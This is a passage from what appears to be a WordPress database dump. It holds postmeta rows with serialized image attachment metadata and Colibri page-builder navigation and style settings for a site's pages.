J3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-1-1024x222.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:222;}s:9:\"thumbnail\";a:3:{s:4:\"file\";s:69:\"cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-1-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;}s:12:\"medium_large\";a:3:{s:4:\"file\";s:69:\"cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-1-768x167.webp\";s:5:\"width\";i:768;s:6:\"height\";i:167;}s:9:\"1536x1536\";a:3:{s:4:\"file\";s:70:\"cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-1-1536x333.webp\";s:5:\"width\";i:1536;s:6:\"height\";i:333;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:15:\"image-converter\";a:5:{s:9:\"thumbnail\";s:3:\"IME\";s:6:\"medium\";s:3:\"IME\";s:12:\"medium_large\";s:3:\"IME\";s:5:\"large\";s:3:\"IME\";s:9:\"1536x1536\";s:3:\"IME\";}}'),(291,220,'_wp_attached_file','2022/02/colibri-image-31.png'),(292,220,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:1920;s:6:\"height\";i:1280;s:4:\"file\";s:28:\"2022/02/colibri-image-31.png\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:3:{s:4:\"file\";s:28:\"colibri-image-31-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;}s:5:\"large\";a:3:{s:4:\"file\";s:29:\"colibri-image-31-1024x683.png\";s:5:\"width\";i:1024;s:6:\"height\";i:683;}s:9:\"thumbnail\";a:3:{s:4:\"file\";s:28:\"colibri-image-31-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;}s:12:\"medium_large\";a:3:{s:4:\"file\";s:28:\"colibri-image-31-768x512.png\";s:5:\"width\";i:768;s:6:\"height\";i:512;}s:9:\"1536x1536\";a:3:{s:4:\"file\";s:30:\"colibri-image-31-1536x1024.png\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:15:\"image-converter\";a:5:{s:9:\"thumbnail\";s:3:\"IME\";s:6:\"medium\";s:3:\"IME\";s:12:\"medium_large\";s:3:\"IME\";s:5:\"large\";s:3:\"IME\";s:9:\"1536x1536\";s:3:\"IME\";}}'),(372,249,'_wp_attached_file','2022/02/Chetan-Tiwari_300x300.jpg'),(373,249,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:300;s:6:\"height\";i:300;s:4:\"file\";s:33:\"2022/02/Chetan-Tiwari_300x300.jpg\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:4:{s:4:\"file\";s:33:\"Chetan-Tiwari_300x300-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:3:{s:4:\"file\";s:33:\"Chetan-Tiwari_300x300-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:15:\"image-converter\";a:1:{s:9:\"thumbnail\";s:3:\"IME\";}}'),(383,258,'_wp_attached_file','2022/02/unsplash.jpg'),(384,258,'_wp_attachment_metadata','a:6:{s:5:\"width\";i:532;s:6:\"height\";i:492;s:4:\"file\";s:20:\"2022/02/unsplash.jpg\";s:5:\"sizes\";a:2:{s:6:\"medium\";a:3:{s:4:\"file\";s:20:\"unsplash-300x277.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:277;}s:9:\"thumbnail\";a:3:{s:4:\"file\";s:20:\"unsplash-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}s:15:\"image-converter\";a:2:{s:9:\"thumbnail\";s:3:\"IME\";s:6:\"medium\";s:3:\"IME\";}}'),(413,288,'is_colibri-wp_front_page','1'),(414,288,'extend_builder','a:2:{s:4:\"json\";i:168;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:15:{i:0;i:228;i:1;i:271;i:2;i:272;i:3;i:273;i:4;i:274;i:5;i:275;i:6;i:276;i:7;i:273;i:8;i:274;i:9;i:275;i:10;i:276;i:11;i:273;i:12;i:274;i:13;i:275;i:14;i:276;}}}'),(415,290,'extend_builder','a:2:{s:4:\"json\";i:23;s:4:\"meta\";a:4:{s:5:\"22-h2\";a:1:{s:4:\"data\";a:2:{s:6:\"sticky\";a:7:{s:9:\"className\";s:28:\"h-navigation_sticky animated\";s:10:\"topSpacing\";i:0;s:3:\"top\";i:0;s:14:\"stickyOnMobile\";b:1;s:14:\"stickyOnTablet\";b:1;s:14:\"startAfterNode\";a:2:{s:7:\"enabled\";b:0;s:8:\"selector\";s:21:\".header, .page-header\";}s:10:\"animations\";a:6:{s:7:\"enabled\";b:0;s:23:\"currentInAnimationClass\";s:11:\"slideInDown\";s:24:\"currentOutAnimationClass\";s:22:\"slideOutDownNavigation\";s:22:\"allInAnimationsClasses\";s:46:\"slideInDown fadeIn h-global-transition-disable\";s:23:\"allOutAnimationsClasses\";s:58:\"slideOutDownNavigation fadeOut h-global-transition-disable\";s:8:\"duration\";i:500;}}s:7:\"overlap\";b:1;}}s:5:\"22-h8\";a:1:{s:4:\"data\";a:1:{s:4:\"type\";s:10:\"horizontal\";}}s:6:\"22-h11\";a:1:{s:4:\"data\";a:0:{}}s:9:\"styleRefs\";a:36:{i:0;i:194;i:1;i:244;i:2;i:245;i:3;i:246;i:4;i:247;i:5;i:248;i:6;i:249;i:7;i:250;i:8;i:251;i:9;i:252;i:10;i:253;i:11;i:254;i:12;i:255;i:13;i:256;i:14;i:257;i:15;i:258;i:16;i:259;i:17;i:260;i:18;i:261;i:19;i:262;i:20;i:263;i:21;i:264;i:22;i:265;i:23;i:212;i:24;i:213;i:25;i:214;i:26;i:215;i:27;i:216;i:28;i:217;i:29;i:218;i:30;i:220;i:31;i:221;i:32;i:222;i:33;i:223;i:34;i:224;i:35;i:225;}}}'),(420,295,'is_colibri-wp_front_page','1'),(421,295,'extend_builder','a:2:{s:4:\"json\";i:168;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:15:{i:0;i:228;i:1;i:271;i:2;i:272;i:3;i:273;i:4;i:274;i:5;i:275;i:6;i:276;i:7;i:273;i:8;i:274;i:9;i:275;i:10;i:276;i:11;i:273;i:12;i:274;i:13;i:275;i:14;i:276;}}}'),(422,297,'extend_builder','a:2:{s:4:\"json\";i:23;s:4:\"meta\";a:4:{s:5:\"22-h2\";a:1:{s:4:\"data\";a:2:{s:6:\"sticky\";a:7:{s:9:\"className\";s:28:\"h-navigation_sticky animated\";s:10:\"topSpacing\";i:0;s:3:\"top\";i:0;s:14:\"stickyOnMobile\";b:1;s:14:\"stickyOnTablet\";b:1;s:14:\"startAfterNode\";a:2:{s:7:\"enabled\";b:0;s:8:\"selector\";s:21:\".header, .page-header\";}s:10:\"animations\";a:6:{s:7:\"enabled\";b:0;s:23:\"currentInAnimationClass\";s:11:\"slideInDown\";s:24:\"currentOutAnimationClass\";s:22:\"slideOutDownNavigation\";s:22:\"allInAnimationsClasses\";s:46:\"slideInDown fadeIn h-global-transition-disable\";s:23:\"allOutAnimationsClasses\";s:58:\"slideOutDownNavigation fadeOut h-global-transition-disable\";s:8:\"duration\";i:500;}}s:7:\"overlap\";b:0;}}s:5:\"22-h8\";a:1:{s:4:\"data\";a:1:{s:4:\"type\";s:10:\"horizontal\";}}s:6:\"22-h11\";a:1:{s:4:\"data\";a:0:{}}s:9:\"styleRefs\";a:36:{i:0;i:194;i:1;i:244;i:2;i:245;i:3;i:246;i:4;i:247;i:5;i:248;i:6;i:249;i:7;i:250;i:8;i:251;i:9;i:252;i:10;i:253;i:11;i:254;i:12;i:255;i:13;i:256;i:14;i:257;i:15;i:258;i:16;i:259;i:17;i:260;i:18;i:261;i:19;i:262;i:20;i:263;i:21;i:264;i:22;i:265;i:23;i:212;i:24;i:213;i:25;i:214;i:26;i:215;i:27;i:216;i:28;i:217;i:29;i:218;i:30;i:220;i:31;i:221;i:32;i:222;i:33;i:223;i:34;i:224;i:35;i:225;}}}'),(427,302,'is_colibri-wp_front_page','1'),(428,302,'extend_builder','a:2:{s:4:\"json\";i:168;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:15:{i:0;i:228;i:1;i:271;i:2;i:272;i:3;i:273;i:4;i:274;i:5;i:275;i:6;i:276;i:7;i:273;i:8;i:274;i:9;i:275;i:10;i:276;i:11;i:273;i:12;i:274;i:13;i:275;i:14;i:276;}}}'),(429,304,'extend_builder','a:2:{s:4:\"json\";i:23;s:4:\"meta\";a:4:{s:5:\"22-h2\";a:1:{s:4:\"data\";a:2:{s:6:\"sticky\";a:7:{s:9:\"className\";s:28:\"h-navigation_sticky animated\";s:10:\"topSpacing\";i:0;s:3:\"top\";i:0;s:14:\"stickyOnMobile\";b:1;s:14:\"stickyOnTablet\";b:1;s:14:\"startAfterNode\";a:2:{s:7:\"enabled\";b:0;s:8:\"selector\";s:21:\".header, .page-header\";}s:10:\"animations\";a:6:{s:7:\"enabled\";b:0;s:23:\"currentInAnimationClass\";s:11:\"slideInDown\";s:24:\"currentOutAnimationClass\";s:22:\"slideOutDownNavigation\";s:22:\"allInAnimationsClasses\";s:46:\"slideInDown fadeIn h-global-transition-disable\";s:23:\"allOutAnimationsClasses\";s:58:\"slideOutDownNavigation fadeOut h-global-transition-disable\";s:8:\"duration\";i:500;}}s:7:\"overlap\";b:0;}}s:5:\"22-h8\";a:1:{s:4:\"data\";a:1:{s:4:\"type\";s:10:\"horizontal\";}}s:6:\"22-h11\";a:1:{s:4:\"data\";a:0:{}}s:9:\"styleRefs\";a:36:{i:0;i:194;i:1;i:244;i:2;i:245;i:3;i:246;i:4;i:247;i:5;i:248;i:6;i:249;i:7;i:250;i:8;i:251;i:9;i:252;i:10;i:253;i:11;i:254;i:12;i:255;i:13;i:256;i:14;i:257;i:15;i:258;i:16;i:259;i:17;i:260;i:18;i:261;i:19;i:262;i:20;i:263;i:21;i:264;i:22;i:265;i:23;i:212;i:24;i:213;i:25;i:214;i:26;i:215;i:27;i:216;i:28;i:217;i:29;i:218;i:30;i:220;i:31;i:221;i:32;i:222;i:33;i:223;i:34;i:224;i:35;i:225;}}}'),(434,309,'is_colibri-wp_front_page','1'),(435,309,'extend_builder','a:2:{s:4:\"json\";i:168;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:15:{i:0;i:228;i:1;i:271;i:2;i:272;i:3;i:273;i:4;i:274;i:5;i:275;i:6;i:276;i:7;i:273;i:8;i:274;i:9;i:275;i:10;i:276;i:11;i:273;i:12;i:274;i:13;i:275;i:14;i:276;}}}'),(436,311,'extend_builder','a:2:{s:4:\"json\";i:23;s:4:\"meta\";a:4:{s:5:\"22-h2\";a:1:{s:4:\"data\";a:2:{s:6:\"sticky\";a:7:{s:9:\"className\";s:28:\"h-navigation_sticky animated\";s:10:\"topSpacing\";i:0;s:3:\"top\";i:0;s:14:\"stickyOnMobile\";b:1;s:14:\"stickyOnTablet\";b:1;s:14:\"startAfterNode\";a:2:{s:7:\"enabled\";b:0;s:8:\"selector\";s:21:\".header, .page-header\";}s:10:\"animations\";a:6:{s:7:\"enabled\";b:0;s:23:\"currentInAnimationClass\";s:11:\"slideInDown\";s:24:\"currentOutAnimationClass\";s:22:\"slideOutDownNavigation\";s:22:\"allInAnimationsClasses\";s:46:\"slideInDown fadeIn h-global-transition-disable\";s:23:\"allOutAnimationsClasses\";s:58:\"slideOutDownNavigation fadeOut h-global-transition-disable\";s:8:\"duration\";i:500;}}s:7:\"overlap\";b:0;}}s:5:\"22-h8\";a:1:{s:4:\"data\";a:1:{s:4:\"type\";s:10:\"horizontal\";}}s:6:\"22-h11\";a:1:{s:4:\"data\";a:0:{}}s:9:\"styleRefs\";a:36:{i:0;i:194;i:1;i:244;i:2;i:245;i:3;i:246;i:4;i:247;i:5;i:248;i:6;i:249;i:7;i:250;i:8;i:251;i:9;i:252;i:10;i:253;i:11;i:254;i:12;i:255;i:13;i:256;i:14;i:257;i:15;i:258;i:16;i:259;i:17;i:260;i:18;i:261;i:19;i:262;i:20;i:263;i:21;i:264;i:22;i:265;i:23;i:212;i:24;i:213;i:25;i:214;i:26;i:215;i:27;i:216;i:28;i:217;i:29;i:218;i:30;i:220;i:31;i:221;i:32;i:222;i:33;i:223;i:34;i:224;i:35;i:225;}}}'),(441,316,'is_colibri-wp_front_page','1'),(442,316,'extend_builder','a:2:{s:4:\"json\";i:168;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:15:{i:0;i:228;i:1;i:271;i:2;i:272;i:3;i:273;i:4;i:274;i:5;i:275;i:6;i:276;i:7;i:273;i:8;i:274;i:9;i:275;i:10;i:276;i:11;i:273;i:12;i:274;i:13;i:275;i:14;i:276;}}}'),(443,318,'extend_builder','a:2:{s:4:\"json\";i:23;s:4:\"meta\";a:4:{s:5:\"22-h2\";a:1:{s:4:\"data\";a:2:{s:6:\"sticky\";a:7:{s:9:\"className\";s:28:\"h-navigation_sticky animated\";s:10:\"topSpacing\";i:0;s:3:\"top\";i:0;s:14:\"stickyOnMobile\";b:1;s:14:\"stickyOnTablet\";b:1;s:14:\"startAfterNode\";a:2:{s:7:\"enabled\";b:0;s:8:\"selector\";s:21:\".header, .page-header\";}s:10:\"animations\";a:6:{s:7:\"enabled\";b:0;s:23:\"currentInAnimationClass\";s:11:\"slideInDown\";s:24:\"currentOutAnimationClass\";s:22:\"slideOutDownNavigation\";s:22:\"allInAnimationsClasses\";s:46:\"slideInDown fadeIn h-global-transition-disable\";s:23:\"allOutAnimationsClasses\";s:58:\"slideOutDownNavigation fadeOut h-global-transition-disable\";s:8:\"duration\";i:500;}}s:7:\"overlap\";b:0;}}s:5:\"22-h8\";a:1:{s:4:\"data\";a:1:{s:4:\"type\";s:10:\"horizontal\";}}s:6:\"22-h11\";a:1:{s:4:\"data\";a:0:{}}s:9:\"styleRefs\";a:36:{i:0;i:194;i:1;i:244;i:2;i:245;i:3;i:246;i:4;i:247;i:5;i:248;i:6;i:249;i:7;i:250;i:8;i:251;i:9;i:252;i:10;i:253;i:11;i:254;i:12;i:255;i:13;i:256;i:14;i:257;i:15;i:258;i:16;i:259;i:17;i:260;i:18;i:261;i:19;i:262;i:20;i:263;i:21;i:264;i:22;i:265;i:23;i:212;i:24;i:213;i:25;i:214;i:26;i:215;i:27;i:216;i:28;i:217;i:29;i:218;i:30;i:220;i:31;i:221;i:32;i:222;i:33;i:223;i:34;i:224;i:35;i:225;}}}'),(448,323,'is_colibri-wp_front_page','1'),(449,323,'extend_builder','a:2:{s:4:\"json\";i:168;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:15:{i:0;i:228;i:1;i:271;i:2;i:272;i:3;i:273;i:4;i:274;i:5;i:275;i:6;i:276;i:7;i:273;i:8;i:274;i:9;i:275;i:10;i:276;i:11;i:273;i:12;i:274;i:13;i:275;i:14;i:276;}}}'),(450,325,'extend_builder','a:2:{s:4:\"json\";i:23;s:4:\"meta\";a:4:{s:5:\"22-h2\";a:1:{s:4:\"data\";a:2:{s:6:\"sticky\";a:7:{s:9:\"className\";s:28:\"h-navigation_sticky animated\";s:10:\"topSpacing\";i:0;s:3:\"top\";i:0;s:14:\"stickyOnMobile\";b:1;s:14:\"stickyOnTablet\";b:1;s:14:\"startAfterNode\";a:2:{s:7:\"enabled\";b:0;s:8:\"selector\";s:21:\".header, .page-header\";}s:10:\"animations\";a:6:{s:7:\"enabled\";b:0;s:23:\"currentInAnimationClass\";s:11:\"slideInDown\";s:24:\"currentOutAnimationClass\";s:22:\"slideOutDownNavigation\";s:22:\"allInAnimationsClasses\";s:46:\"slideInDown fadeIn h-global-transition-disable\";s:23:\"allOutAnimationsClasses\";s:58:\"slideOutDownNavigation fadeOut h-global-transition-disable\";s:8:\"duration\";i:500;}}s:7:\"overlap\";b:0;}}s:5:\"22-h8\";a:1:{s:4:\"data\";a:1:{s:4:\"type\";s:10:\"horizontal\";}}s:6:\"22-h11\";a:1:{s:4:\"data\";a:0:{}}s:9:\"styleRefs\";a:36:{i:0;i:194;i:1;i:244;i:2;i:245;i:3;i:246;i:4;i:247;i:5;i:248;i:6;i:249;i:7;i:250;i:8;i:251;i:9;i:252;i:10;i:253;i:11;i:254;i:12;i:255;i:13;i:256;i:14;i:257;i:15;i:258;i:16;i:259;i:17;i:260;i:18;i:261;i:19;i:262;i:20;i:263;i:21;i:264;i:22;i:265;i:23;i:212;i:24;i:213;i:25;i:214;i:26;i:215;i:27;i:216;i:28;i:217;i:29;i:218;i:30;i:220;i:31;i:221;i:32;i:222;i:33;i:223;i:34;i:224;i:35;i:225;}}}'),(455,330,'is_colibri-wp_front_page','1'),(456,330,'extend_builder','a:2:{s:4:\"json\";i:168;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:15:{i:0;i:228;i:1;i:271;i:2;i:272;i:3;i:273;i:4;i:274;i:5;i:275;i:6;i:276;i:7;i:273;i:8;i:274;i:9;i:275;i:10;i:276;i:11;i:273;i:12;i:274;i:13;i:275;i:14;i:276;}}}'),(457,332,'extend_builder','a:2:{s:4:\"json\";i:23;s:4:\"meta\";a:4:{s:5:\"22-h2\";a:1:{s:4:\"data\";a:2:{s:6:\"sticky\";a:7:{s:9:\"className\";s:28:\"h-navigation_sticky animated\";s:10:\"topSpacing\";i:0;s:3:\"top\";i:0;s:14:\"stickyOnMobile\";b:1;s:14:\"stickyOnTablet\";b:1;s:14:\"startAfterNode\";a:2:{s:7:\"enabled\";b:0;s:8:\"selector\";s:21:\".header, .page-header\";}s:10:\"animations\";a:6:{s:7:\"enabled\";b:0;s:23:\"currentInAnimationClass\";s:11:\"slideInDown\";s:24:\"currentOutAnimationClass\";s:22:\"slideOutDownNavigation\";s:22:\"allInAnimationsClasses\";s:46:\"slideInDown fadeIn h-global-transition-disable\";s:23:\"allOutAnimationsClasses\";s:58:\"slideOutDownNavigation fadeOut h-global-transition-disable\";s:8:\"duration\";i:500;}}s:7:\"overlap\";b:0;}}s:5:\"22-h8\";a:1:{s:4:\"data\";a:1:{s:4:\"type\";s:10:\"horizontal\";}}s:6:\"22-h11\";a:1:{s:4:\"data\";a:0:{}}s:9:\"styleRefs\";a:36:{i:0;i:194;i:1;i:244;i:2;i:245;i:3;i:246;i:4;i:247;i:5;i:248;i:6;i:249;i:7;i:250;i:8;i:251;i:9;i:252;i:10;i:253;i:11;i:254;i:12;i:255;i:13;i:256;i:14;i:257;i:15;i:258;i:16;i:259;i:17;i:260;i:18;i:261;i:19;i:262;i:20;i:263;i:21;i:264;i:22;i:265;i:23;i:212;i:24;i:213;i:25;i:214;i:26;i:215;i:27;i:216;i:28;i:217;i:29;i:218;i:30;i:220;i:31;i:221;i:32;i:222;i:33;i:223;i:34;i:224;i:35;i:225;}}}'),(462,337,'is_colibri-wp_front_page','1'),(463,337,'extend_builder','a:2:{s:4:\"json\";i:168;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:15:{i:0;i:228;i:1;i:271;i:2;i:272;i:3;i:273;i:4;i:274;i:5;i:275;i:6;i:276;i:7;i:273;i:8;i:274;i:9;i:275;i:10;i:276;i:11;i:273;i:12;i:274;i:13;i:275;i:14;i:276;}}}'),(464,339,'extend_builder','a:2:{s:4:\"json\";i:23;s:4:\"meta\";a:4:{s:5:\"22-h2\";a:1:{s:4:\"data\";a:2:{s:6:\"sticky\";a:7:{s:9:\"className\";s:28:\"h-navigation_sticky animated\";s:10:\"topSpacing\";i:0;s:3:\"top\";i:0;s:14:\"stickyOnMobile\";b:1;s:14:\"stickyOnTablet\";b:1;s:14:\"startAfterNode\";a:2:{s:7:\"enabled\";b:0;s:8:\"selector\";s:21:\".header, .page-header\";}s:10:\"animations\";a:6:{s:7:\"enabled\";b:0;s:23:\"currentInAnimationClass\";s:11:\"slideInDown\";s:24:\"currentOutAnimationClass\";s:22:\"slideOutDownNavigation\";s:22:\"allInAnimationsClasses\";s:46:\"slideInDown fadeIn h-global-transition-disable\";s:23:\"allOutAnimationsClasses\";s:58:\"slideOutDownNavigation fadeOut h-global-transition-disable\";s:8:\"duration\";i:500;}}s:7:\"overlap\";b:0;}}s:5:\"22-h8\";a:1:{s:4:\"data\";a:1:{s:4:\"type\";s:10:\"horizontal\";}}s:6:\"22-h11\";a:1:{s:4:\"data\";a:0:{}}s:9:\"styleRefs\";a:36:{i:0;i:194;i:1;i:244;i:2;i:245;i:3;i:246;i:4;i:247;i:5;i:248;i:6;i:249;i:7;i:250;i:8;i:251;i:9;i:252;i:10;i:253;i:11;i:254;i:12;i:255;i:13;i:256;i:14;i:257;i:15;i:258;i:16;i:259;i:17;i:260;i:18;i:261;i:19;i:262;i:20;i:263;i:21;i:264;i:22;i:265;i:23;i:212;i:24;i:213;i:25;i:214;i:26;i:215;i:27;i:216;i:28;i:217;i:29;i:218;i:30;i:220;i:31;i:221;i:32;i:222;i:33;i:223;i:34;i:224;i:35;i:225;}}}'),(468,343,'_wp_attached_file','2022/02/visuals-0RPf107BLek-unsplash.jpg'),(469,343,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:12500;s:6:\"height\";i:8334;s:4:\"file\";s:40:\"2022/02/visuals-0RPf107BLek-unsplash.jpg\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(470,346,'_wp_attached_file','2022/02/cdc.jpg'),(471,346,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1780;s:6:\"height\";i:1177;s:4:\"file\";s:15:\"2022/02/cdc.jpg\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:15:\"cdc-300x198.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:198;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:16:\"cdc-1024x677.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:677;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:15:\"cdc-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:15:\"cdc-768x508.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:508;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:17:\"cdc-1536x1016.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1016;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(475,351,'_wp_attached_file','2022/02/cropped-cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1.webp'),(476,351,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1365;s:6:\"height\";i:1365;s:4:\"file\";s:75:\"2022/02/cropped-cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1.webp\";s:5:\"sizes\";a:4:{s:6:\"medium\";a:4:{s:4:\"file\";s:75:\"cropped-cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-300x300.webp\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/webp\";}s:5:\"large\";a:4:{s:4:\"file\";s:77:\"cropped-cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-1024x1024.webp\";s:5:\"width\";i:1024;s:6:\"height\";i:1024;s:9:\"mime-type\";s:10:\"image/webp\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:75:\"cropped-cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-150x150.webp\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/webp\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:75:\"cropped-cropped-eyJ3IjoyMDQ4LCJoIjoyMDQ4LCJzY29wZSI6ImFwcCJ9-1-768x768.webp\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/webp\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(477,352,'_wp_attached_file','2022/02/colibri-image-381.png'),(478,352,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1280;s:4:\"file\";s:29:\"2022/02/colibri-image-381.png\";s:5:\"sizes\";a:5:{s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"colibri-image-381-300x200.png\";s:5:\"width\";i:300;s:6:\"height\";i:200;s:9:\"mime-type\";s:9:\"image/png\";}s:5:\"large\";a:4:{s:4:\"file\";s:30:\"colibri-image-381-1024x683.png\";s:5:\"width\";i:1024;s:6:\"height\";i:683;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"colibri-image-381-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:29:\"colibri-image-381-768x512.png\";s:5:\"width\";i:768;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:31:\"colibri-image-381-1536x1024.png\";s:5:\"width\";i:1536;s:6:\"height\";i:1024;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(479,122,'_wp_page_template','page-templates/full-width-page.php'),(480,122,'extend_builder','a:2:{s:4:\"json\";i:353;s:4:\"meta\";a:1:{s:9:\"styleRefs\";a:14:{i:0;i:280;i:1;i:285;i:2;i:286;i:3;i:287;i:4;i:288;i:5;i:289;i:6;i:290;i:7;i:291;i:8;i:292;i:9;i:2